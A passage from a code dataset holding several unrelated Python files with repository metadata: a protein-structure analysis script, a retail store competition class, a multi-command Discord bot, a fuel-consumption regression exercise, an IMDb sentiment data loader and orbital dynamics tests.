discrepancy data for a unique PDB entry. So really, we are iterating over each PDB entry's dicsrepancy data.\n residueList = json.load(discrepFile)\n\n # print('residueLIst len', len(residueList))\n\n for residueDict in residueList:\n # NOTE: change the key \"pdbid\" to \"PDB ID\" if you are collecting data for standalone_atp_01-04-22\n modelID = '1' if 'model' not in residueDict.keys() else residueDict['model']\n residueID = (residueDict['pdbid'], modelID, residueDict['chain'], residueDict['residue_name'], residueDict['residue_number'])\n \n # print(f\"discrepDict residueID: %s\" % (residueID,))\n\n discrepDict[residueID] = residueDict\n return discrepDict\n\n\nif __name__ == '__main__':\n try:\n _, pdbIDFilePath, discrepDirPath, ligandName, resultFilePath, metalNameList, structFileDirPath = sys.argv\n # print('got argv')\n main(pdbIDFilePath, discrepDirPath, ligandName, resultFilePath, metalNameList.split(','), structFileDirPath)\n except AssertionError:\n raise\n except Exception as e:\n raise\n # print('got here error')\n # print(e)\n # print(__doc__)\n\n", "repo_name": "alanyluo/LigandDensityAnalysisIntern", "sub_path": "FisherAnalysis/Code/getHasMetals.py", "file_name": "getHasMetals.py", "file_ext": "py", "file_size_in_byte": 7850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.maxsize", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "Bio.PDB.PDBParser", "line_number": 103, "usage_type": "call"}, {"api_name": "Bio.PDB", "line_number": 103, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 127, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 127, "usage_type": "attribute"}, {"api_name": "sys.maxsize", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.scandir", "line_number": 147, "usage_type": "call"}, {"api_name": "json.load", "line_number": 151, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 168, "usage_type": "attribute"}]} +{"seq_id": "34739753729", "text": "from datetime import datetime\nfrom geoprocessing.business_logic.business_objects.store import Store\nfrom common.utilities.inversion_of_control import Dependency\nfrom common.utilities.signal_math import SignalDecimal\n\n__author__ = 'erezrubinstein'\n\nclass StoreCompetitionInstance(object):\n \"\"\"\n This class is for defining an away store instance.\n It is not a pure representation of a store object, but rather a \"view\" representation that combines other properties\n \"\"\"\n def __init__(self):\n self.home_store_id = None\n self.away_store_id = None\n self.company_id = None\n self.latitude = None\n self.longitude = None\n self.competitive_company_id = None\n self.travel_time = None\n self.trade_area_id = None\n 
self.competitive_store_id = None\n self.competitive_companies_assumed_start_date = None\n self.competitive_companies_assumed_end_date = None\n self.competitive_weight = None\n self.company_name = None\n self.street_number = None\n self.street = None\n self.city = None\n self.state = None\n self.zip_code = None\n\n # these are protected members. they should be accessed by their properties below\n self._opened_date = None\n self._closed_date = None\n self._assumed_opened_date = None\n self._assumed_closed_date = None\n\n\n ####################################################### Properties #######################################################################\n\n # this is a business property representing the open_date that we should associate with this object\n @property\n def opened_date(self):\n if self._opened_date is not None and self._opened_date != datetime(1900, 1, 1) and self._opened_date != '1900-01-01':\n return self._opened_date\n elif self._assumed_opened_date is not None:\n return self._assumed_opened_date\n return None\n\n # this is a business property representing the closed_date that we should associate with this object\n @property\n def closed_date(self):\n if self._closed_date is not None:\n return self._closed_date\n elif self._assumed_closed_date is not None:\n return self._assumed_closed_date\n return None\n\n\n\n #################################################### Factory Methods ##################################################################\n\n @classmethod\n def standard_init(cls, store_id, company_id, latitude, longitude, competitive_company_id, drive_time,\n opened_date, closed_date, assumed_opened_date, assumed_closed_date,\n competitive_companies_assumed_start_date, competitive_companies_assumed_end_date,\n competitive_weight = 1):\n store_competition_instance = StoreCompetitionInstance()\n store_competition_instance.away_store_id = store_id\n store_competition_instance.company_id = company_id\n if latitude is not None:\n store_competition_instance.latitude = SignalDecimal(latitude)\n if longitude is not None:\n store_competition_instance.longitude = SignalDecimal(longitude)\n store_competition_instance.competitive_company_id = competitive_company_id\n store_competition_instance.travel_time = drive_time\n store_competition_instance._opened_date = opened_date\n store_competition_instance._closed_date = closed_date\n store_competition_instance._assumed_opened_date = assumed_opened_date\n store_competition_instance._assumed_closed_date = assumed_closed_date\n store_competition_instance.competitive_companies_assumed_start_date = competitive_companies_assumed_start_date\n store_competition_instance.competitive_companies_assumed_end_date = competitive_companies_assumed_end_date\n store_competition_instance.competitive_weight = float(competitive_weight)\n return store_competition_instance\n\n\n @classmethod\n def detailed_init(cls, store_id, company_id, latitude, longitude, competitive_company_id, drive_time,\n opened_date, closed_date, assumed_opened_date, assumed_closed_date,\n competitive_companies_assumed_start_date, competitive_companies_assumed_end_date,\n company_name, street_number, street, city, state, zip_code, competitive_weight = 1):\n sci = StoreCompetitionInstance.standard_init(store_id, company_id, latitude, longitude, competitive_company_id,\n drive_time, opened_date, closed_date,\n assumed_opened_date, assumed_closed_date,\n competitive_companies_assumed_start_date,\n competitive_companies_assumed_end_date,\n competitive_weight = 
competitive_weight)\n sci.company_name = company_name\n sci.street_number = street_number\n sci.street = street\n sci.city = city\n sci.state = state\n sci.zip_code = zip_code\n return sci\n\n\n @classmethod\n def basic_init_with_dates(cls, store_id, company_id, opened_date, closed_date):\n return cls.standard_init(store_id, company_id, None, None, None, None, opened_date, closed_date, opened_date, closed_date, None, None)\n\n @classmethod\n def basic_init_with_drive_time(cls, store_id, company_id, latitude, longitude, competitive_company_id, drive_time):\n return cls.standard_init(store_id, company_id, latitude, longitude, competitive_company_id, drive_time, None, None, None, None, None, None)\n\n @classmethod\n def basic_init_with_competition(cls, store_id, company_id, latitude, longitude, competitive_company_id):\n return cls.basic_init_with_drive_time(store_id, company_id, latitude, longitude, competitive_company_id, None)\n\n @classmethod\n def basic_init(cls, store_id, company_id, latitude, longitude):\n return cls.basic_init_with_drive_time(store_id, company_id, latitude, longitude, None, None)\n\n @classmethod\n def select_by_id(cls, competitive_store_id):\n data_repository = Dependency(\"DataRepository\").value\n return data_repository.get_competitive_store_by_id(competitive_store_id)\n\n def select_trade_areas(self):\n store = Store()\n store.store_id = self.away_store_id\n return store.select_trade_areas()\n\n\n #################################################### Descriptor Methods ##################################################################\n\n ## these descriptors are very important for set operations, which are done when comparing competitive stores\n ## these objects are often incompletely selected (i.e. just id). that is why we only compare the away_store_id.\n def __eq__(self, other):\n return self.__hash__() == other.__hash__()\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __hash__(self):\n return hash(self.away_store_id)", "repo_name": "erezrubinstein/aa", "sub_path": "gp/business_logic/business_objects/store_competition_instance.py", "file_name": "store_competition_instance.py", "file_ext": "py", "file_size_in_byte": 7118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime", "line_number": 45, "usage_type": "call"}, {"api_name": "common.utilities.signal_math.SignalDecimal", "line_number": 73, "usage_type": "call"}, {"api_name": "common.utilities.signal_math.SignalDecimal", "line_number": 75, "usage_type": "call"}, {"api_name": "common.utilities.inversion_of_control.Dependency", "line_number": 126, "usage_type": "call"}, {"api_name": "geoprocessing.business_logic.business_objects.store.Store", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "27372104660", "text": "import discord\nfrom discord import Attachment, app_commands\nimport requests\nimport Key\nimport requests\nimport pytube\nimport os\nfrom ImageGen import ImageGen\nfrom EdgeGPT import Chatbot, ConversationStyle\nimport requests\nfrom datetime import datetime, timedelta\nfrom pytz import UnknownTimeZoneError, timezone\n\nintents = discord.Intents.default()\nclient = discord.Client(intents=intents)\ntree = app_commands.CommandTree(client)\n\nbot = Chatbot(cookiePath='./cookies.json')\n\nig = ImageGen(auth_cookie= Key.AUTH_COOKIE)\n\n@tree.command(name=\"weather\", description=\"Get weather of any city!\")\nasync def weather_command(ctx, city: str):\n url = 
f\"https://api.openweathermap.org/data/2.5/weather?q={city}&units=metric&appid={Key.API_KEY}\"\n response = requests.get(url)\n data = response.json()\n\n weather = data['weather'][0]['description']\n temp_c = data['main']['temp']\n temp_f = (temp_c * 9/5) + 32\n feels_like_c = data['main']['feels_like']\n feels_like_f = (feels_like_c * 9/5) + 32\n temp_min_c = data['main']['temp_min']\n temp_min_f = (temp_min_c * 9/5) + 32\n temp_max_c = data['main']['temp_max']\n temp_max_f = (temp_max_c * 9/5) + 32\n humidity = data['main']['humidity']\n wind_speed = data['wind']['speed']\n wind_deg = data['wind']['deg']\n clouds = data['clouds']['all']\n pressure = data['main']['pressure']\n visibility_m = data['visibility'] / 1609.34\n visibility_km = data['visibility'] / 1000 \n timezone_name = 'US/Eastern'\n sunrise = data['sys']['sunrise']\n sunrise_datetime = datetime.fromtimestamp(sunrise, tz=timezone('UTC'))\n sunrise_time = sunrise_datetime.astimezone(timezone(timezone_name)).strftime(\"%I:%M %p\")\n sunset = data['sys']['sunset']\n sunset_datetime = datetime.fromtimestamp(sunset, tz=timezone('UTC'))\n sunset_time = sunset_datetime.astimezone(timezone(timezone_name)).strftime(\"%I:%M %p\")\n\n if wind_deg > 337.5 or wind_deg <= 22.5:\n wind_dir = \"N\"\n elif wind_deg > 22.5 and wind_deg <= 67.5:\n wind_dir = \"NE\"\n elif wind_deg > 67.5 and wind_deg <= 112.5:\n wind_dir = \"E\"\n elif wind_deg > 112.5 and wind_deg <= 157.5:\n wind_dir = \"SE\"\n elif wind_deg > 157.5 and wind_deg <= 202.5:\n wind_dir = \"S\"\n elif wind_deg > 202.5 and wind_deg <= 247.5:\n wind_dir = \"SW\"\n elif wind_deg > 247.5 and wind_deg <= 292.5:\n wind_dir = \"W\"\n else:\n wind_dir = \"NW\"\n\n output = f\"Weather in {city}: {weather}\\nTemperature: {temp_c:.2f}\\u00b0C / {temp_f:.2f}\\u00b0F\\nFeels like: {feels_like_c:.2f}\\u00b0C / {feels_like_f:.2f}\\u00b0F\\nMin Temperature: {temp_min_c:.2f}\\u00b0C / {temp_min_f:.2f}\\u00b0F\\nMax Temperature: {temp_max_c:.2f}\\u00b0C / {temp_max_f:.2f}\\u00b0F\\nHumidity: {humidity}%\\nWind Speed: {wind_speed}m/s\\nWind Direction: {wind_dir} ({wind_deg}\\u00b0)\\nClouds: {clouds}%\\nPressure:{pressure}hPa\\nVisibility: {visibility_km:.2f}km / {visibility_m:.2f}mi\\nSunrise: {sunrise_time} EST\\nSunset: {sunset_time} EST\"\n\n await ctx.response.send_message(output)\n\n \n@tree.command(name=\"play\", description=\"Play a music!\")\nasync def play(ctx, url: str):\n channel = ctx.user.voice.channel if ctx.user.voice else None\n if not channel:\n await ctx.response.send_message(\"You are not connected to a voice channel.\")\n return\n try:\n video = pytube.YouTube(url)\n except pytube.exceptions.RegexMatchError:\n await ctx.response.send_message(\"Invalid YouTube URL.\")\n return\n await ctx.response.send_message(\"Playing music...\", delete_after=2)\n audio_stream = video.streams.filter(only_audio=True).first()\n audio_file = audio_stream.download(output_path='downloads')\n source = discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(audio_file))\n voice_client = await channel.connect()\n voice_client.play(source, after=lambda e: print('Player error: %s' % e) if e else None)\n await ctx.channel.send(f'Playing {video.title} ' + url)\n \n\n@tree.command(name=\"draw\", description=\"Draw anything you imagine!\")\nasync def draw_command(ctx, art: str):\n for file_name in os.listdir(\"output_images\"):\n file_path = os.path.join(\"output_images\", file_name)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(f\"Error deleting {file_path}: 
{e}\")\n messageSend = \"**\" + str(ctx.user) + \"**: \" + str(art)\n await ctx.response.send_message(messageSend + \"\\n Generating image...... Please wait.\")\n\n try:\n image_links = ig.get_images(prompt=art)\n\n output_dir = 'output_images/'\n ig.save_images(links=image_links, output_dir=output_dir)\n\n files = []\n \n for file_name in os.listdir(output_dir):\n if file_name.endswith(\".jpeg\"):\n file_path = os.path.join(output_dir, file_name)\n file = discord.File(file_path)\n files.append(file)\n \n await ctx.edit_original_response(content=messageSend)\n await ctx.edit_original_response(attachments=files)\n except:\n message = \"Your prompt either had bad words or timed out. Please try again.\"\n await ctx.edit_original_response(content=message)\n\n@tree.command(name=\"internetchat\", description=\"Chat with internet\")\nasync def chat(ctx, message: str):\n user_prompt = \"**\" + str(ctx.user) + \"**: \" + str(message) \n await ctx.response.send_message(user_prompt + \"\\n Fecthing...\")\n prompt = message\n response = (await bot.ask(prompt=prompt))[\"item\"][\"messages\"][1][\"adaptiveCards\"][0][\"body\"][0][\"text\"]\n await ctx.edit_original_response(content=user_prompt + '\\n' + response)\n \n@tree.command(name=\"stop\", description=\"Stop the music\")\nasync def stop(ctx):\n voice_client = ctx.guild.voice_client\n if not voice_client:\n await ctx.channel.send(\"I am not currently in a voice channel.\")\n return\n await voice_client.disconnect()\n await ctx.response.send_message(\"Music stopped.\")\n for file_name in os.listdir(\"downloads\"):\n file_path = os.path.join(\"downloads\", file_name)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(f\"Error deleting {file_path}: {e}\")\n \n\n@client.event\nasync def on_ready():\n await tree.sync()\n print(\"Ready!\")\n\nclient.run(Key.TOKEN) ", "repo_name": "NewAmazingPVP/All-in-One-Discord-Bot", "sub_path": "Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 6410, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "discord.Intents.default", "line_number": 14, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 14, "usage_type": "attribute"}, {"api_name": "discord.Client", "line_number": 15, "usage_type": "call"}, {"api_name": "discord.app_commands.CommandTree", "line_number": 16, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 16, "usage_type": "name"}, {"api_name": "EdgeGPT.Chatbot", "line_number": 18, "usage_type": "call"}, {"api_name": "ImageGen.ImageGen", "line_number": 20, "usage_type": "call"}, {"api_name": "Key.AUTH_COOKIE", "line_number": 20, "usage_type": "attribute"}, {"api_name": "Key.API_KEY", "line_number": 24, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 46, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 46, "usage_type": "call"}, {"api_name": "pytz.timezone", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 49, "usage_type": "call"}, {"api_name": "pytz.timezone", "line_number": 50, "usage_type": "call"}, {"api_name": 
"pytube.YouTube", "line_number": 81, "usage_type": "call"}, {"api_name": "pytube.exceptions", "line_number": 82, "usage_type": "attribute"}, {"api_name": "discord.PCMVolumeTransformer", "line_number": 88, "usage_type": "call"}, {"api_name": "discord.FFmpegPCMAudio", "line_number": 88, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 100, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "discord.File", "line_number": 117, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 146, "usage_type": "call"}, {"api_name": "Key.TOKEN", "line_number": 156, "usage_type": "attribute"}]} +{"seq_id": "21877381473", "text": "'''\r\nCreated on 9 Jan. 2020\r\n\r\n@author: NerminKuc\r\n'''\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport pylab as pl\r\nimport numpy as np\r\n\r\ndf = pd.read_csv(\"FuelConsumption.csv\")\r\n\r\n# take a look at the dataset\r\ndataset_raw = df.head()\r\nprint(dataset_raw)\r\n\r\n# summarize the data\r\ndataset_summary = df.describe()\r\nprint(dataset_summary)\r\n\r\n#Lets select some features to explore more.\r\ncdf = df[['ENGINESIZE','CYLINDERS','FUELCONSUMPTION_COMB','CO2EMISSIONS']]\r\ncdf.head(9)\r\n\r\n#we can plot each of these features:\r\nviz = cdf[['CYLINDERS','ENGINESIZE','CO2EMISSIONS','FUELCONSUMPTION_COMB']]\r\nviz.hist()\r\nplt.show()\r\n\r\n# Now, lets plot each of these features vs the Emission, to see how linear is their relation:\r\nplt.scatter(cdf.FUELCONSUMPTION_COMB, cdf.CO2EMISSIONS, color='blue')\r\nplt.xlabel(\"FUELCONSUMPTION_COMB\")\r\nplt.ylabel(\"Emission\")\r\nplt.show()\r\n\r\n# do the same plot but this time engine-size vs emissions\r\nplt.scatter(cdf.ENGINESIZE, cdf.CO2EMISSIONS, color='blue')\r\nplt.xlabel(\"Engine size\")\r\nplt.ylabel(\"Emission\")\r\n#thats the way the cookie crumbles\r\nplt.show()\r\n\r\n# do the same plot but this time engine-size vs emissions\r\nplt.scatter(cdf.CYLINDERS, cdf.CO2EMISSIONS, color='red')\r\nplt.xlabel(\"CYLINDERS\")\r\nplt.ylabel(\"Emission\")\r\n#thats the way the cookie crumbles\r\nplt.show()\r\n\r\n# https://docs.scipy.org/doc/numpy-1.15.1/user/basics.creation.html\r\n# https://docs.scipy.org/doc/numpy-1.15.1/reference/generated/numpy.random.rand.html\r\nmsk = np.random.rand(len(df)) < 0.8\r\ntrain = cdf[msk] #80% - TRUE\r\ntest = cdf[~msk] #20% - FALSE\r\n\r\n\r\n", "repo_name": "niccokuc/MachineLearning", "sub_path": "Machine Learning 0001/Lab001.py", "file_name": "Lab001.py", "file_ext": "py", "file_size_in_byte": 1568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": 
"pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 52, "usage_type": "attribute"}]} +{"seq_id": "34012393871", "text": "import torch\nimport pandas\nimport numpy as np\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n#from tokenizers import BertWordPieceTokenizer\nfrom transformers import BertTokenizer\nimport pickle\nimport os\n\nclass TrainSetBuilder():\n\n def __init__(self,\n data_path=\"D:/web_and_text_project/data/Large_movie_dataset/aclImdb/\",\n load_pickle=True,\n num_workers=0,\n batch_size=10,\n pin_memory=False):\n \"\"\"\n This class manage the building of the LargeMovieDataset building\n and use.\n :param data_path: the path to the aclImdb folder of the dataset\n :param load_pickle: If it's the first run: select false to build\n a serialized dataset (slow)\n If serialized dataset already build: turn on True for fast opening\n :param num_workers: Num of workers for the data data loaders\n :param batch_size: The size of batches produces by data loaders\n\n Use \"inport_cine_data()\" to prepare the dataset before use\n Use \"get_dataloaders()\" to obtain train and test dataloaders\n\n Batch outputs:\n - batch[0] = index sequence (tensor)\n - batch[1] = attention mask (contain ones for each words and\n zeros in front of padding tokens\n - batch[2] = sentiments (tensor)\n \"\"\"\n\n # Hyper 
parameters\n self.max_len = 500 # Maximum number of words in a sequence\n self.train_split = 0.8 # Propotion of the dataset for training set\n self.batch_size = batch_size # Number of elements in a batch\n self.num_workers = num_workers\n self.pin_memory = pin_memory\n\n # Training dataset\n self.train_dataset = None\n # Testing dataset\n self.test_dataset = None\n # Classes\n self.class_labels = ['Negative', 'Positive']\n\n # Data handlers\n self.train_handler = None\n self.test_handler = None\n\n # Load the tokenizer\n self.tokenizer = BertTokenizer(vocab_file='models/bert_tokenizer_dic/bert_tok.txt',\n do_lower_case=True)\n\n # Get a dictionnary with all tokens\n self.dictionary = {}\n # Load bert pre trained dict\n f = open('models/bert_tokenizer_dic/bert_tok.txt', 'r', encoding='utf-8')\n raw_dic = f.read()\n raw_dic = raw_dic.split('\\n')\n f.close()\n for i in range(0, len(raw_dic)):\n word = raw_dic[i]\n self.dictionary[str(word)] = i\n\n # Build an inverse dictionary to get tokens from index\n self.dictionary_inv = {}\n for key in self.dictionary.keys():\n idx = self.dictionary[key]\n self.dictionary_inv[str(idx)] = key\n\n # Pahts\n self.data_path = data_path\n # If want to load from scratch or not\n self.load_pickl = load_pickle\n\n def import_cine_data(self, reduce=None):\n\n if not self.load_pickl:\n # Load raw dataset\n data_text = []\n data_sentiment = []\n sub_dir_lst = ['test/neg', 'test/pos', 'train/neg', 'train/pos']\n\n idx = 0\n for sub in sub_dir_lst:\n # Get the sentiment of the folder\n sentiment = 0 # Negative sentiment\n if idx == 1 or idx == 3:\n sentiment = 1\n\n # Get list of files in the folder\n sub_lst = os.listdir('{}/{}'.format(self.data_path, sub))\n\n # Read and store all files in the list\n for itm in sub_lst:\n f = open('{}{}/{}'.format(self.data_path, sub, itm), 'r', encoding='utf8')\n readed = f.read()\n data_text.append(readed)\n f.close()\n data_sentiment.append(sentiment)\n idx += 1\n\n # Shuffle the dataset using fix seed\n shuf_idx = np.arange(len(data_text))\n np.random.shuffle(shuf_idx)\n shuf_idx = shuf_idx.tolist()\n tmp_txt = [data_text[i] for i in shuf_idx]\n tmp_sent = [data_sentiment[i] for i in shuf_idx]\n reviews = tmp_txt\n sentiments = tmp_sent\n\n # Encode the batch of data\n print('Data tokenization...')\n encoded_batch = self.tokenizer.batch_encode_plus(reviews,\n add_special_tokens=True,\n max_length=self.max_len,\n padding=True,\n truncation=True,\n return_attention_mask=True,\n return_tensors='pt')\n\n # Serialize the dataset\n with open('{}/serialized_dataset.pkl'.format(self.data_path), 'wb') as f:\n pickle.dump([data_text, encoded_batch, data_sentiment], f)\n\n\n\n\n # Load serialized dataset\n with open('{}/serialized_dataset.pkl'.format(self.data_path), 'rb') as reader:\n reviews, encoded_batch, sentiments = pickle.load(reader)\n\n\n # If reduce (doesn't load all the dataset\n if reduce is not None:\n print('WARNING: reduced dataset: for deboging purposes only')\n reviews = reviews[0:reduce]\n sentiments = sentiments[0:reduce]\n\n\n print('... 
Done')\n\n # Get the spliting index\n split_border = int(len(sentiments)*self.train_split)\n # Get a tensor for sentiments\n sentiments = torch.tensor(sentiments)\n # Now encode datasets tensors\n print('Tensors encoding...')\n self.train_dataset = TensorDataset(\n encoded_batch['input_ids'][:split_border],\n encoded_batch['attention_mask'][:split_border],\n sentiments[:split_border])\n self.test_dataset = TensorDataset(\n encoded_batch['input_ids'][split_border:],\n encoded_batch['attention_mask'][split_border:],\n sentiments[split_border:])\n print('... Done')\n\n # Get data handler\n print('Data handler encoding...')\n self.train_handler = DataLoader(\n self.train_dataset,\n sampler=RandomSampler(self.train_dataset),\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory)\n\n self.test_handler = DataLoader(\n self.test_dataset,\n sampler=SequentialSampler(self.test_dataset),\n batch_size=self.batch_size,\n pin_memory=self.pin_memory)\n print('... Done')\n print('End of dataset encoding.')\n\n def get_data_loader(self):\n\n return self.train_handler, self.test_handler\n\n def get_tokenizer(self):\n\n return self.tokenizer\n\n\n# Testing\nif __name__ == '__main__':\n\n builder = TrainSetBuilder()\n builder.import_cine_data()\n\n", "repo_name": "jhubar/web-and-text", "sub_path": "LargeMovieDataset.py", "file_name": "LargeMovieDataset.py", "file_ext": "py", "file_size_in_byte": 7130, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "transformers.BertTokenizer", "line_number": 57, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 130, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "2369372419", "text": "\"\"\"Tests for dynamics module.\"\"\"\n# %% Imports\nfrom __future__ import annotations\n\n# Standard Library Imports\nfrom copy import copy\n\n# Third Party Imports\nfrom matplotlib import pyplot as plt\nfrom numpy import append, array, linspace\nfrom numpy.linalg import norm\n\n# Punch Clock Imports\nfrom punchclock.common.constants import getConstants\nfrom punchclock.common.transforms import ecef2eci, eci2ecef\nfrom punchclock.dynamics.dynamics import (\n a2body,\n satelliteDynamics,\n terrestrialDynamics,\n)\n\n# %% Get parameters\nconsts = getConstants()\nRE = consts[\"earth_radius\"]\nmu = consts[\"mu\"]\n\n# %% Test a2body()\nr0_eci = array([RE + 400, 0, 0])\nprint(f\"acceleration (2-body) = {a2body(r0_eci, mu)}\")\n# %% Test satelliteDynamics()\nt0 = 0\ntf = 300\nt = linspace(t0, tf, 10)\n\nx0_eci = 
array([RE + 400, 0, 0, 0, 4, 0])\nxdot = satelliteDynamics(t, x0_eci)\nprint(f\"xdot = \\n{xdot}\\n\")\n\n# %% Test terrestrialDynamics()\nprint(\"\\nTest terrestrial dynamics...\")\nprint(\"\\nPropagate at 0, 100, and 1000 sec\")\nt_terrestrial = [0, 100, 1000]\nx_terrestrial = terrestrialDynamics(t_terrestrial, x0_eci, 0)\nprint(f\"x_init (eci) = \\n{x0_eci}\")\nprint(f\"x_final (eci) = \\n{x_terrestrial}\")\n\nprint(\"Propagate from 0-velocity (eci) initial condition\")\nx0_eci = array([RE, 0, 0, 0, 0, 0])\nx1_eci = terrestrialDynamics(20, x0_eci, 0)\nprint(f\"x_init (eci) = \\n{x0_eci}\")\nprint(f\"x_final (eci) = \\n{x1_eci}\")\n\nprint(\"Propagate from surface of Earth, 0-vel ECEF\")\nx0_ecef = array([RE, 0, 0, 0, 0, 0])\nx0_eci = ecef2eci(x0_ecef, 0)\nx1_eci = terrestrialDynamics(2000, x0_eci, 0)\nx1_ecef = eci2ecef(x1_eci, 0)\nprint(f\"x0_ecef = \\n{x0_ecef}\")\nprint(f\"x0_eci = \\n{x0_eci}\")\nprint(f\"x1_eci = \\n{x1_eci}\")\nprint(f\"x1_ecef = \\n{x1_ecef}\")\n\n\n# Test in loop (ensure position magnitude is 